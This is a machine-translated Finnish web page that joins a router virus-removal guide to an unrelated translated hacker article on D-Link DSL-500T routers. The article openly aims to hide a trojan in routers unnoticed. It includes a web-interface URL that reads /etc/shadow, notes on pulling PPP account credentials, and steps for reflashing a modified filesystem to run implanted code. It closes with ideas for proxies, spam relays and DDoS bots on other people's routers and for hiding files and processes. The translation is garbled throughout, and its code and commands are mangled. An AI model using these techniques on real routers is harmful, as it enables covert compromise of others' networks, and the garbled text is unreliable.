Virushyökkäys tp link -modeemeihin. Virus reitittimessä - haitallinen DNS

Koska Internetin käyttäjien laitteissa on yhä enemmän DNS-korvauksia haittaohjelmilla, herää kysymys Wi-Fi-reitittimien turvallisuudesta. Kuinka tarkistaa reitittimesi virusten varalta? Kuinka poistaa virus reitittimestä? Kysymys on monimutkainen ja yksinkertainen samanaikaisesti. On ratkaisu!


Virus itse ei voi tallentaa itseään useimmille nykyaikaisille reitittimille, koska reitittimen muistissa on vähän tilaa, mutta se voi zombistaa reitittimen osallistumaan bottiverkkoon. Yleensä tämä on bottiverkko eri palvelimiin hyökkäämiseen tai Internetiin jättävän tiedon uudelleenohjaamiseen ja analysointiin.

Salasanasi ja henkilökohtainen kirjeenvaihtosi voivat joutua hyökkääjien käsiin!

Tämä on korjattava mahdollisimman nopeasti.

  • Reitittimen nollaus
  • Reitittimen laiteohjelmisto
  • Nollataan

Reitittimen nollaus

Voit nollata reitittimen asetukset painamalla nollauspainiketta. Yleensä tämä painike sijaitsee reitittimen takana, missä LAN-portit ovat. Yleensä nappi on upotettu reikään tahattoman painamisen välttämiseksi, joten sinun on käytettävä hammastikkua. Tämä poistaa viruksen muuttamat reitittimen asetukset ja asentaa tehdasasetukset niiden tilalle. Minun on varoitettava, että jos et tiedä, kuinka reititin määritetään, niin nollaa sen asetukset sinulle ei ole sen arvoinen!

Reitittimen laiteohjelmisto

Joskus virus "tulvii" muokattu laiteohjelmisto reitittimeen. Voit poistaa viruksen laiteohjelmiston reitittimestä päivittämällä reitittimen uudelleen.

Liitä tietokone reitittimeen LAN-kaapelilla. LAN-kaapeli toimitetaan minkä tahansa reitittimen mukana. Tai Wi-Fi:n kautta, jos kaapeliyhteys ei ole mahdollista. On parempi yhdistää kaapelilla! Langaton yhteys katsotaan epävakaaksi, eikä se sovellu reitittimen laiteohjelmiston päivittämiseen.

Kun olemme muodostaneet yhteyden reitittimeen, avaa selain (Chrome, Opera, Mozilla, IE) ja kirjoita osoitepalkkiin ASUS-reitittimen osoite, Asusille se on 192.168.1.1, avautuvalla sivulla sinun on syötä kirjautumistunnuksesi ja salasanasi päästäksesi reitittimen asetuksiin. Kirjautuminen: admin, Salasana: admin. Jos kirjautumistunnus ja salasana eivät täsmää, kysy henkilöltä, joka asensi reitittimen sinulle, ehkä hän muutti ne.

Lataa laiteohjelmisto valmistajan verkkosivustolta ja valitse laiteohjelmisto levyltä reitittimen asetussivulta. Suurimmalla osalla reitittimistä laiteohjelmiston vaiheet ovat samat.

Ongelmia Wi-Fi:n jakamisessa reitittimen avulla ilmenee useista syistä. Yksi niistä on jakelulaitteen tartuttaminen viruksella, jonka voit päästä eroon itse.

  • virus, joka hidastaa Internetin nopeutta monin tavoin. Esimerkiksi tällainen haittaohjelma sotkee ​​laiteohjelmiston asetukset tai alkaa ladata jotain mainosvirussisältöä tietokoneelle;
  • virus, joka korvaa verkkosivustojen osoitteet. Se näyttää tältä: käyttäjä menee mille tahansa tunnetulle turvalliselle sivustolle, ja virus muuttaa DNS:ää siten, että käyttäjä päätyy mainossivustolle tai näkee mainosbannereita sinne, missä sivuston omistajat eivät ole niitä sijoittaneet. Tällainen virus on myös vaarallinen, koska se voi ohjata sinut sivustolle, joka sisältää muita viruksia.

Joka tapauksessa, jos huomaat, että reitittimesi ei toimi oikein, sinun tulee tarkistaa se virusten varalta, varsinkin kun niistä on erittäin helppo päästä eroon.

Miten virus pääsee reitittimeen?

Reititin tarjoaa Internetin kaikille siihen liitetyille laitteille. Tämä tarkoittaa, että kaikki laitteet ja itse reititin ovat samassa kotiverkossa. Tätä virus hyödyntää: se pääsee tietokoneelle joltakin verkkosivustolta tai ladatusta tiedostosta ja sitten se siirtyy verkon kautta reitittimeen, jossa se alkaa leikkiä likaisia ​​temppuja. Prosessi riippuu viruksen mallista, esimerkiksi jotkut haittaohjelmat eivät havaitse itseään tietokoneessa, vaan alkavat toimia vasta päästyään reitittimeen, kun taas toiset onnistuvat vahingoittamaan sekä käyttöjärjestelmää että reitittimen laiteohjelmistoa samaan aikaan.

Reitittimen tarkistus

Ennen kuin puhdistat reitittimesi viruksista, sinun on tarkistettava, onko siinä viruksia. Tuloksen selvittämiseksi sinun on käytettävä Internetiä suoraan tietokoneesi kautta. Eli irrota WLAN-kaapeli tai modeemi reitittimestä ja aseta se tietokoneen porttiin ja toimi sitten seuraavasti:

Jos sinulla on ongelmia nopeuden kanssa, noudata näitä kolmea vaihetta.

  1. Tarkista Internetin nopeus. Tämä on tehtävä, jotta tulevaisuudessa saadaan selville, onko nopeus sama käytettäessä verkkoa suoraan ja reitittimen kautta. Voit esimerkiksi ladata tiedoston tai käyttää Speedtest-verkkopalvelua.

    Tarkistamme Internetin nopeuden Speedtest-sivuston kautta

  2. Signaalin laadun määrittämiseksi tarkemmin sinun on selvitettävä ping-ilmaisin. Ping on aika, joka kuluu signaalin lähettämiseen laitteeltasi, palvelimelle saapumiseen ja takaisin palaamiseen. Luonnollisesti mitä suurempi se on, sitä huonompi se on sinulle. Avaa komentorivi, kirjoita ping ip -komento ja suorita se. Yhteytesi IP-osoite, oletusarvo on yleensä 192.168.0.1, mutta se voi vaihdella. Muista tulos. Normaali ping-arvo jopa 40 ms on erinomainen indikaattori, 40–110 ms on normaali keskiarvo, yli 110 ms kannattaa miettiä verkon uudelleenkonfigurointia, signaalin parantamista tai palveluntarjoajan vaihtoa.

    Suorita ping ip -komento

  3. Lähetettyjen pakettien luettelon jälkeen näet tilastot. Olet kiinnostunut rivistä "Paketit", se laskee, kuinka monta pakettia lähetettiin, kadonnut, valmistui. Jos kadonneiden pakettien määrä ylittää 5%, sinun on selvitettävä, mikä ongelma on. Jos suuri määrä paketteja ei pääse palvelimelle tai palaa takaisin, tämä vaikuttaa suuresti Internetin nopeuteen.

    Katsotaan kuinka monta prosenttia paketeista katoaa

Kun olet suorittanut kaikki yllä olevat vaiheet, hanki yksityiskohtaiset tiedot pingistä, kadonneiden pakettien määrästä ja Internetin nopeudesta, liitä WLAN-kaapeli tai modeemi uudelleen reitittimeen ja tarkista kaikki samat ilmaisimet, kun muodostat yhteyden Wi-Fi-yhteyden kautta. Jos parametrit ovat suunnilleen samalla tasolla, ongelma ei ole reitittimessä, ehkä syy on operaattorin puolella. Muussa tapauksessa, jos Internet-ongelmia ilmenee vain käytettäessä sitä reitittimen kautta, sinun on nollattava asetukset ja puhdistettava se viruksista.

Viruksen poisto

Viruksen poistamiseksi sinun on palautettava asetukset oletusarvoihin. Jos virus onnistui vahingoittamaan laiteohjelmistoa, sinun on asennettava se uudelleen itse.

Palauta asetukset

  1. Etsi Reset-painike reitittimen takaa. Se on yleensä pienempi kuin kaikki muut. Sitä on painettava 10-15 sekuntia. Kun reititin sammuu ja alkaa käynnistyä uudelleen, voit vapauttaa sen. Reitittimen uudelleenkäynnistys ilmoittaa, että asetukset on palautettu. Huomaa, että myös asettamasi salasana menetetään.

    Paina Reset-painiketta

  2. Jos haluat määrittää reitittimen uudelleen, sinun on yhdistettävä se tietokoneeseesi kaapelilla ja avattava selain ja siirryttävä osoitteeseen http://192.168.0.1. Ehkä osoite on erilainen, ja löydät sen itse reitittimessä olevasta tarrasta tai reitittimen mukana tulleesta dokumentaatiosta. Sinulta kysytään kirjautumistunnusta ja salasanaa, oletuskirjautumistunnus on admin ja salasana on admin tai 12345. Tarkemmat tiedot on kuvattu reitittimen ohjeissa.
  3. Siirry kohtaan Pika-asennus. Määritä sinulle sopivat vaihtoehdot. Jos haluat, aseta salasana ja vaihda verkon nimi. Kun asennus on valmis, tallenna muutokset ja käynnistä reititin uudelleen.

    Siirry "Pika-asennus"-osioon ja määritä kätevät asetukset

Kun olet suorittanut kaikki yllä olevat vaiheet, tarkista, pääsitkö eroon virheestä. Jos ei, sinun on päivitettävä reititin manuaalisesti.

Reitittimen päivitys

Reitittimen laiteohjelmisto on mahdollista vain, jos laite on kytketty tietokoneeseen kaapelilla. Laiteohjelmistoa ei voi päivittää Wi-Fin kautta.

  1. Reitittimen takana on tarra. Etsi reitittimesi malli siitä. Se sisältää myös tietoja alun perin asennetusta laiteohjelmistoversiosta. Jos sen versio on 7, on parempi asentaa päivitys versioon 7, jotta vältetään ristiriidat liian uuden laiteohjelmiston ja reitittimen vanhan laitteiston välillä.

    Selvitä laiteohjelmistoversio ja reitittimen malli

  2. Siirry valmistajan verkkosivustolle ja etsi mallillesi haluamasi versio hakupalkin avulla. Lataa se tietokoneellesi.

    Etsi ja lataa tarvittava laiteohjelmistoversio

  3. Ladattu tiedosto arkistoidaan. Pura sen sisältö mihin tahansa sopivaan kansioon.

    Kuinka suojata reitittimesi viruksilta tulevaisuudessa

    Ainoa tapa suojata reititintä viruksilta on estää niitä pääsemästä tietokoneeseen. Tietokoneesi on suojattu virustorjuntaohjelmalla. Asenna moderni virustorjunta äläkä missään tapauksessa poista käytöstä. Haittaohjelmia on lähes mahdotonta saada kiinni aktivoidulla virustorjuntaohjelmalla. Nykyään ei tarvitse edes käyttää maksullisia turvaohjelmia, vaan laadukkaat ilmaiset analogit ovat riittävät.

    Mitä tehdä, jos mikään ei auta

    Jos kaikkien yllä olevien ohjeiden noudattaminen ei tuonut toivottua tulosta, on kaksi vaihtoehtoa: ongelma johtuu reitittimen fyysisen osan rikkoutumisesta tai palveluntarjoajan virheistä. Ensin sinun tulee soittaa Internet-yhteyttäsi tarjoavalle yritykselle ja kertoa heille ongelmastasi ja menetelmistä, jotka eivät ole auttaneet sitä ratkaisemaan. Toiseksi reititin tulee viedä erikoishuoltoon, jotta asiantuntijat voivat tutkia sen.

    Reitittimen saastuminen viruksella on harvinainen tapaus, mutta vaarallinen. On kaksi tapaa päästä eroon viruksesta: nollaamalla asetukset ja päivittämällä laiteohjelmiston. Sinun on myös varmistettava, ettei tietokoneellesi jää haittaohjelmia.

Hei lukijani! Tässä artikkelissa puhun upeista ADSL-reitittimistä
– koti- ja teollisuusverkoissa välttämättömiä rautakappaleita. Kerron sinulle kysymyksestä
näiden rauhasten hyväksikäyttö meille hyödyllisiin tarkoituksiin - ompeleminen brutaalista
Troijalainen reitittimen sisällä. Ja niin, ettei kukaan huomaa
älykäs ylläpitäjä, ei älykäs käyttäjä.

Toiveet tai IQ-vaatimukset

Kun kirjoitin tämän artikkelin, oletin, että sen lukeminen riittäisi
edistynyt käyttäjä, jolla on asennettuna GNU\Linux ja jolla on myös joitain taitoja
työskennellä ja ohjelmoida tässä käyttöjärjestelmässä. Näyttää kuitenkin siltä
on mahdollista toistaa vaiheeni Windowsissa (esimerkiksi Cygwinillä), mutta
tätä ei kuvata. Saadaksesi maksimaalisen nautinnon tarvitset myös
juotosraudan taidot (tämä on valinnainen).

Ja kaikki alkoi...

Jotenkin hajamielin. Joten, kaikki alkoi, kun tämä sama katkaisi puhelun eräänä päivänä
laitteiston osa, tai pikemminkin se katkaisi petollisesti Internet-yhteyden, mutta ei
Halusin palauttaa sen. Samaan aikaan hän oli kaukana, fyysisesti saavutettavissa
En tullut katsomaan häntä (valehtelin kuitenkin jotenkin - olin vain liian laiska nousemaan sohvalta
käynnistä reititin uudelleen :)), verkkoliittymä ei vastannut, mutta muistin sen
Tällä asialla pitäisi olla telnet tai ssh. Kirjaudu hallintoalueelle
ole kokeillut aiemmin enkä huolimattomasti vaihtanut tilini salasanaa (kuten
Se osoittautui myöhemmin, aivan turhaan, koska oletuksena se on "admin:admin"). Niin minä
Kokeilin SSH:ta ja se toimi!

$ssh [sähköposti suojattu]
$Password:

Kuin salama taivaasta! BusyBox! En ole koskaan ajatellut kenen alla
Tämä reititin on ohjattu, käy ilmi - GNU/Linux! Tunsin oloni kauhistuneeksi
Ihmettelen kuinka kaikki täällä toimii, ja henkisesti laiskuuden ja sattuman ansiosta minä
meni tutkimukseen.

Tiedon kerääminen

Joten mistä aloitin? Tietenkin käytettävissä olevien komentojen luettelosta:

#varattu laatikko
...
Tällä hetkellä määritellyt toiminnot:
[, tuhka, busybox, kissa, chgrp, chmod, chown, cp, päivämäärä, dd, df, kaiku, väärä, ilmainen,
grep, isäntänimi, id, ifconfig, init, insmod, kill, ln, kirjautuminen, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, reitti, sh, lepotila,
synkronointi, tar, testi, tftp, kosketus, tosi, tty, umount, wget, whoami, kyllä

Sarja on varsin kohtuullinen, riittää normaaliin tutkimukseen ja ideoiden toteuttamiseen.
Seuraavaksi kiinnostus ydinversiota kohtaan heräsi:

# kissa /proc/versio
Linux-versio 2.4.17_mvl21-malta-mips_fp_le (root@xy) (gcc-versio 2.95.3
20010315 (julkaisu/MontaVista)) #1 to 28. joulukuuta 05:45:00 CST 2006

Viitteeksi: MontaVista on sulautettu jakelu
järjestelmät. Suurin osa verkkolaitteiden valmistajista tarjoaa
etusija tälle järjestelmälle. Se löytyy myös muista laitteista, esim
e-kirjoja tai matkapuhelimia.

# kissa /etc/versios
ASIAKAS=DLinkRU
MALLI = DSL-500T
VERSIO=V3.02B01T01.RU.20061228
HTML_LANG=FI.302
BOARD = AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# kissa /proc/cpuinfo
prosessori
: 0
CPU malli
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
odota ohjeita: ei
mikrosekunnin ajastimet: kyllä
ylimääräinen keskeytysvektori: kyllä
laitteiston tarkkailupiste: kyllä
VCED-poikkeukset: ei saatavilla
VCEI-poikkeukset: ei saatavilla

AR7 on Texas Instrumentsin kehittämä kaksiytiminen siru. Hän
sisältää täysimittaisen ADSL-reitittimen yhdellä sirulla, joka tukee ADSL1-standardeja,
ADSL2, ADSL2+. Perustuu tehokkaaseen RISC-prosessoriin MIPS 4KEc, jossa
kellotaajuus 175 tai 233 (valmistustekniikasta riippuen: 18 mikronia
tai 13 µm). Siru sisältää 2 UART-liitäntää, joista yksi (UART_A)
käytetään virheenkorjaustietojen tulostamiseen sekä EJTAG-liitäntä, joka palvelee
virheenkorjaus (laiteohjelmisto) Flash-muisti. Näiden rajapintojen käytöstä keskustellaan
kuvailtu alla.

Lopuksi katsoin muistitietoja:

# cat /proc/mounts
/dev/mtdblock/0/squashfs ro 0 0
ei mitään /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0

# cat /proc/mtd
dev: koko poista nimi
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

Luonnollisesti lohkoosoitteita unohtamatta:

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

Yllä olevasta seuraa, että Flash-muistissa (/dev/mtdblock) on 5 lohkoa:

mtd0– kuva SquashFs-tiedostojärjestelmästä. Tämä on erityinen tiedosto
järjestelmä, joka on pakattu ja vain luku -tilassa. varten
pakkausalgoritmia gzip käytetään, mutta tässä tapauksessa - LZMA (pakkaussuhde
korkeampi). Tämän lohkon koko on 4 MB.

mtd1– tämä lohko sisältää LZMA-algoritmilla pakatun MontaVista-ytimen
kunto, lohkokoko 600 KB.

mtd2– Bootloader ADAM2, lataa ytimen, on myös
palvelun FTP-palvelin palautusta ja vilkkumista varten. Siitä tulee tarkempaa tietoa
edelleen todettu. Lohkon koko on 64 kt.

mtd3– jaettu konfigurointitietojen ja ympäristön kesken
(ympäristömuuttujat) -lohko, jota voit tarkastella hakemistossa /proc/ticfg/env.
Asetustiedot sijaitsevat hakemistossa /etc/config.xml. Välittäjä tiedostojen välillä
järjestelmässä konfigurointilohko on suljettu (kuten kaikki cm_*, ohjaus, o
ne myöhemmin) ohjelma cm_logic. Tämän lohkon koko on myös 64 kt.

mtd4– Tämä sisältää laiteohjelmiston allekirjoituksen, ytimen ja tiedoston kuvan
järjestelmät. Tätä lohkoa käytetään päivitettäessä laiteohjelmistoa verkkoliittymän kautta.
Aluksi se tallennetaan tähän lohkoon, jonka jälkeen tarkistussumma tarkistetaan
ja jos se sopii, hän ilmoittautuu uuteen paikkaansa.

RAM (16 Mt tässä mallissa, mutta ADAM2 tässä mallissa
näkee vain 14 megatavua, parannetaan päivityksellä), liitetään /var-hakemistoon ja sen
Voit käyttää sitä helposti tarkoituksiinmme:

# vapaa
käytettyjä ilmaisia ​​jaettuja puskureita yhteensä
Muisti: 14276 10452 3824 0

Älä unohda käydä läpi prosessiluetteloa. Niistä mielenkiintoisista, joita täällä piilee
demonit: thttpd - Web-palvelin; dproxy - välityspalvelin, joka tallentaa DNS-pyynnöt välimuistiin; ddnsd
- DNS-daemon; pppd... on todellinen demoni, joka toteuttaa yhteyden protokollan kautta
PPP, ja parametreissa näemme tilitiedot. Joten jos reititin ei ole
teeskentelee olevansa letku (lue – ei siltatilassa), niin voit
tilin saamisen helppous.

cm_*-ohjelmat on suljettu ja lähdekoodi sisältää jo
käännetty (nämä ohjelmat on myös kehittänyt Texas Instruments, D-Linkissä
Ei ole mitään järkeä kiistellä lisenssien noudattamatta jättämisestä).

cm_logic– ohjelma, joka ohjaa järjestelmän logiikkaa sen kautta
konfigurointi on käynnissä; synkronoi /etc/config.xml:n kanssa
vastaava osa /dev/ticfg:n sisällöstä (osoittaa mtd3:een).

cm_cli– komentoriviliittymä hallintaa ja konfigurointia varten
järjestelmät. Esimerkiksi yhteysasetukset tehdään tämän käyttöliittymän kautta.

cm_pc– käynnistää ja valvoo prosesseja, yhteyksiä sääntöihin
(esimerkiksi ajaa ohjelmaa demonina; säännöt sisältävät myös tietoja
avoimet portit) kuvattu tiedostossa /etc/progdefs.xml; latautuu heti sen jälkeen
ytimiä.

webcm– CGI-käyttöliittymä, vuotava, mahdollistaa esimerkiksi tiedoston /etc/shadow katselun,
yksinkertaisesti käyttämällä URL-osoitetta.

http://192.168.1.1/../../../etc/shadow

En saanut mitään, thttpd ei ole niin yksinkertainen, mutta jos on:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Toinen asia. Tätä voidaan käyttää tietojen keräämiseen, jos niihin ei ole pääsyä
ssh/telnet, mutta siellä on pääsy verkkokäyttöliittymään.

firmwarecfg– käytetään laiteohjelmiston vilkkumiseen verkkoliitännän kautta. Sisäänkäynnillä
Tämän ohjelman kuva siirretään POST-pyynnöllä verkkoliittymästä, ja se on jo
uudelleenohjaa Flash-muistiin tarkastettuaan ensin kuvan tarkistussumman.

Tässä vaiheessa ensisijaisten tietojen keruu on valmis, on aika siirtyä ratkaisevaan
Toiminnot.

Kehitystyökalujen asennus ja laiteohjelmiston kääntäminen

Laiteohjelmisto D-Link-reitittimille (ja kaikille muille GNU/Linux-pohjaisille)
jaetaan GPL-lisenssillä, saat ne viralliselta
FTP-palvelin. Itse asiassa voit valita minkä tahansa ehdotettujen laiteohjelmistojen luettelosta,
ne ovat samat (koskien T-sarjaa). Toimitus sisältää ytimen lähdekoodin, ympäristön,
tarvittavat työkalut ja työkaluketju olemassa olevien kehittämiseen/koontamiseen
ohjelmia. Se tulee purkaa juureen ja lisätä ympäristömuuttujaan
PATH polku työkaluketjun bin hakemistoon:

$ tar xvf tools.tgz
$ vientipolku=$PATH:/opt/

Nyt, jos haluat kääntää oman laiteohjelmistosi, siirry hakemistoon
lähdekoodien kanssa ja suorita tämä sama merkki.

$ cd DSL/TYLinuxV3/src && merkki

Laitetuen käyttöönottamisesta tulee paljon kysymyksiä (parempi
vastaa niihin myönteisesti). Kun käännös on valmis, TYLinuxV3/images-hakemistoon
Laiteohjelmistokuvat luodaan. Voit myös suorittaa skriptin, jolla on sama nimi kuin omasi
malli /TYLinuxV3/src/scripts-hakemistosta.

Muutama sana tiedostojen siirtämisestä reitittimen ja tietokoneen välillä. Aivan ensimmäinen
käyttämäni menetelmä on kyky siirtää tiedostoja SSH-protokollan kautta,
käyttämällä scp-ohjelmaa tähän. Mutta vähän myöhemmin sain selville, että mc (Midnight
Commander) on myös mahdollista muodostaa yhteys SSH:n kautta (Paneeli -> Shell-yhteys).
Vaihtoehtoisesti voit perustaa Web- tai FTP-palvelimen työpaikallesi. Myöhemmin I
Annoin etusijalle web-palvelimen, koska se toimii nopeimmin. Asensin sen
thttpd, pieni ja nopea, aivan kuten reitittimessä. Käynnistämme sen kotona ja lataamme sen osoitteeseen
reititintiedosto, kun olet mennyt hakemistoon /var (se, kuten mainittiin
aiemmin, saatavilla tallennettavaksi).

$ thttpd -g -d ~/Router -u käyttäjälle -p 8080
# cd /var
# wget http://192.168.1.2/file

Jos haluat ladata tiedoston reitittimestä, voit myös nostaa Web-palvelimen:

# thttpd -g -d /var -u juuri -p 8080

Huomaa, että jos haluat ladata suoritettavan tiedoston reitittimestä, sinun tulee tehdä se
poistaa käynnistysoikeudet. Kun lataat suuren määrän tiedostoja reitittimestä
On parempi käyttää mc:tä, sinun ei tarvitse kopioida tiedostoja ensin kansioon /var ja
poista oikeudet ja poista sitten nämä tiedostot vapauttaaksesi tilaa. Yleisesti ottaen asia
maku, valitse mikä tahansa sinulle sopiva vaihtoehto.

Oman ohjelman luominen

Aloitetaan tietysti ohjelmointiklassikosta - HelloWorldistä. Jotkut erikoiset
ei ole sääntöjä. Ohjelman teksti on tuskallisen tuttua:

#sisältää
#sisältää

int main(tyhjä)
{
printf("Mate.Feed.Kill.Repeat.");
paluu 0;
}

Kääntäminen (polku työkaluketjuun on määritettävä ympäristömuuttujassa
PATH):

$ mips_fp_le-gcc hell.c -o helvetti
$ mips_fp_le-strip -s helvetti

# cd /var
# chmod +x helvetti
# ./helvetti

Ja... mitään ei tapahdu tai polkua ei löydy -ilmoitus tulee näkyviin. Mikä se on
tapaus? Olen jo puhunut cm_pc:stä - tämä ohjelma käynnistää muita
tiedostossa /etc/progdefs.xml kuvattujen sääntöjen mukaisesti. Nyt sen aika on koittanut
muokata ja flash-tiedostojärjestelmän kuvia.

Tiedostojärjestelmän muutos

Jotta voit muokata tiedostojärjestelmää, sinun on ensin
purkaa. Kuten jo mainitsin, tiedostojärjestelmä tässä on SquashFs, jossa on LZMA-korjaus.
Laiteohjelmistokehityspaketti sisältää vain mksquashfs-ohjelman (lukuun
kuva), unsquashfs (pakkauksen purkamista varten) puuttuu. Mutta ei se haittaa, kaikki on saatavilla
tiedostojärjestelmän verkkosivustolla tarvitsemme ensimmäisen version. Asettamalla LZMA-laastarin ja
Kerättyään apuohjelmat laitoimme ne syrjään kätevään paikkaan. Ensin saamme kuvan
tiedostojärjestelmä reitittimestä:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs

Nyt voit muokata sitä haluamallasi tavalla, ja voimme lähettää sen FuckTheWorldille
/bin hakemistoon ja lisää sääntö, joka suoritetaan tiedostossa /etc/progdefs.xml.

$ cp hei unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

Ja lisäämme tämän (tunnisteiden väliin ):

helvetti
/bin/helvetti

Tallenna ja pakkaa takaisin:

$ mksquashfs unpacked_fs my_fs.img -noappend

Huomaa, että tiedostojärjestelmän kuva ei saa ylittää
hyväksyttävät koot. Jos tunnet tarvetta kokeilla jotain kiireellisesti, mutta se ei tee
sopii, poista kuvasta kaikki tarpeettomat, kuten grep, whoami tai
käytä UPX-suoritettavan tiedoston pakkaajaa. Lataa se nyt reitittimeen
kuva ja siirry seuraavaan osaan.

Tiedostojärjestelmän kuvan tallentaminen

Reitittimen vilkkuminen on hyvin yksinkertainen
/dev/mtdblock/*. Joten lataa tiedostokuva reitittimeen millä tahansa sopivalla tavalla.
järjestelmä ja suorita tämä yksinkertainen toimenpide:

# cat my_fs.img > /dev/mtdblock/0 && käynnistyy uudelleen

# cp my_fs.img /dev/mtdblock/0 && käynnistyy uudelleen

Jonkin ajan kuluttua, kun tallennusprosessi on valmis, reititin käynnistyy uudelleen ja
muutokset tulevat voimaan. Yritetään ajaa esimerkkiämme:

# helvetti
Mate.Feed.Kill.Repeat.

Palautusmenetelmät epäonnistumisen sattuessa

Ennen kuin käytät reitittimessäsi vakavampaa "käsityötä", sinun tulee selvittää, miten
toimia kriittisissä tapauksissa, kun reititin kieltäytyy
ladata. Ei ole toivottomia tilanteita. ADAM2 FTP-palvelin tulee apuun. varten
Ensin sinun tulee käynnistää FTP-asiakasohjelma ADAM2-IP-osoitteeseen, jota voit vakoilla
tiedostossa /proc/ticfg/env (my_ipaddress -parametri).

$ftp 192.168.1.199
220 ADAM2 FTP-palvelin valmis.
530 Ole hyvä ja kirjaudu sisään tunnuksella USER ja PASS.

Selvyyden vuoksi voit ottaa virheenkorjaustilan käyttöön ja sitten kaikki
tiedot ja kaikki FTP-vastaukset:

Kirjautumistunnus/salasana – adam2/adam2. Vilkkumisprosessi on hyvin yksinkertainen. Aloittaa
vaihda FTP-istunto binääritilaan:

ftp> lainaa MEDIA FLSH

Nyt lähetämme esimerkiksi kuvan tiedostojärjestelmästä ja ilmoitamme sijainnin
kohteet:

ftp> laita fs.img "fs.img mtd0"

Odotamme tallennuksen loppua, käynnistä reititin uudelleen, poistu istunnosta:

ftp> lainaus REBOOT
ftp> lopeta

Kaikki! Kuten näette, ei ole mitään monimutkaista, nyt jos jokin menee pieleen, sinä
voit aina korjata tilanteen.

Käytön helpottamiseksi sinun tulee antaa normaali IP-osoite, ota käyttöön
automaattinen lataus (jotta ei tanssi nollauksen kanssa) ja lisää aikaa hieman
odottaa yhteyttä ennen ytimen lataamista. Kaikki nämä parametrit on tallennettu
ympäristömuuttujat, on olemassa erityisiä FTP ADAM2 -komentoja: GETENV ja SETENV (for
muuttujan saaminen ja asettaminen). Kirjoita FTP-istuntoon seuraava
komennot:

ftp> SETENV automaattinen lataus,1
ftp> SETENV autoload_timeout,8
ftp>SETENV my_ipaddress,192.168.1.1
ftp> lainaus REBOOT
ftp> lopeta

Reititin käynnistyy uudelleen ja voit käyttää ADAM2:ta osoitteessa 192.168.1.1:21. Jos
tulee halu päivittää ytimen näköistiedosto, ja ydin kieltäytyy käynnistymästä, FTP
alkaa itsestään. Varmista ennen muokattujen kuvien vilkkumista
tallentaa nykyiset entisöintiä varten. Yleensä voit muuttaa ympäristömuuttujia
ja /proc/ticfg/env:n kautta halusin vain kertoa sinulle lisää työskentelystä FTP:n kanssa.

# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

Voit tarkistaa muutokset seuraavasti:

# cat /proc/ticfg/env | grep my_ipaddress

Mitä tehdä, jos haluat yrittää päivittää käynnistyslataimen ja miten
mitä tehdä epäonnistuessa? Tai reititin ei jostain syystä käynnisty, ja
ei pääsyä ADAM2:een? On olemassa ratkaisu - JTAG, tai pikemminkin tämä siru sisältää EJTAG: n
(laajennettu versio). Tämä on rajapinta piirin sisäiseen virheenkorjaukseen/ohjelmointiin.

Jotta voimme muodostaa yhteyden tähän käyttöliittymään, tarvitsemme tietokoneen LPT-portin,
liittimet ja 4 vastusta. Kaava on yksinkertainen.

Kiiruhdan huomaamaan, että laiteohjelmisto JTAG:n kautta ei ole nopea tehtävä, se vie melko paljon
paljon aikaa. Joten sitä tulisi käyttää vain käynnistyslataimen palauttamiseen,
vaikka se ei toimisikaan. Jos haluat kommunikoida JTAGin kautta, sinun tulee käyttää erityistä
ohjelma, esimerkiksi UrJTAG. Alla on esimerkki tämän käyttöliittymän toiminnasta.
Yhteyden asetukset:

jtag> rinnakkaiskaapeli 0x378 DLC5
jtag> havaita

Flash-muistin tunnistus:

jtag> detectflash 0x30000000 1

Flash-muistin lukeminen:

jtag> readmem 0x30000000 0x400000 fullflash.img

Kirjoita muistiin (käynnistyslataaja):

jtag> flashmem 0x30000000 adam2.img

On myös hyödyllistä tietää UART-liittymä (lupasin puhua siitä aiemmin). SISÄÄN
UART_A raportoi, eli kirjaa käynnistyslataimen (käynnistyksen varhaisessa vaiheessa osoitteesta
voit kommunikoida hänen kanssaan) ja ydin. Muokattuja ytimiä kirjoitettaessa tämä
välttämätön virheenkorjauksessa. UART - yleinen asynkroninen vastaanotin/lähetin
(yleinen asynkroninen lähetin-vastaanotin) on lähes aina päällä
mikro-ohjaimet.

Sovitinpiiri on hyvin yksinkertainen. Perustuu vain yhteen siruun -
TTL-tason muunnin: MAX232 COM:lle ja FT232R USB:lle. Mikropiirit
Ne ovat melko yleisiä, eikä ostamisessa tule ongelmia.

Piiri on koottu leipälevylle (joka voidaan helposti sijoittaa koteloon
COM-portin liitin) 20 minuutissa ja tuo paljon etuja. Esimerkiksi virheenkorjauksen yhteydessä
ytimet ovat ehdottoman korvaamaton ratkaisu. Entä jos elektroniikka on ongelma? Poistu
ovat USB-johtoja vanhoille puhelimille, niissä on vain muunnin
UART - USB.

Muutamia jakeluideoita

On hienoa, että sinulla on oma välityspalvelin/sox jonkun muun reitittimessä. Aivan kuten roskapostin lähettäminen
reititin kaikille protokollille. Tämä ei ole Windows-tietokone, joka
järjestetään joka kuukausi :). Reitittimiä ei usein vaihdeta tai päivitetä uudelleen. kyllä ​​ja
Kuka muu kuin me voisi edes ajatella reitittimen tartuttamista?

Älä unohda, että meillä on kaikki käyttäjän/verkon liikenne hallinnassa. Lisää
Tehokkaisiin reitittimiin on jo mahdollista ripustaa DDOS-botti. Piilota tiedosto/piilota prosessi,
pysäyttää kirjoittamisen mtd-lohkoihin ylikirjoittamatta ohjelmaamme - kaikki tämä
aivan sama!

Oletetaan, että olet alkamassa kirjoittaa vakavaa ohjelmaa reitittimelle.
Erittäin hyvä virheenkorjaus on tärkeää, joudut todennäköisesti tekemään sen useita kertoja
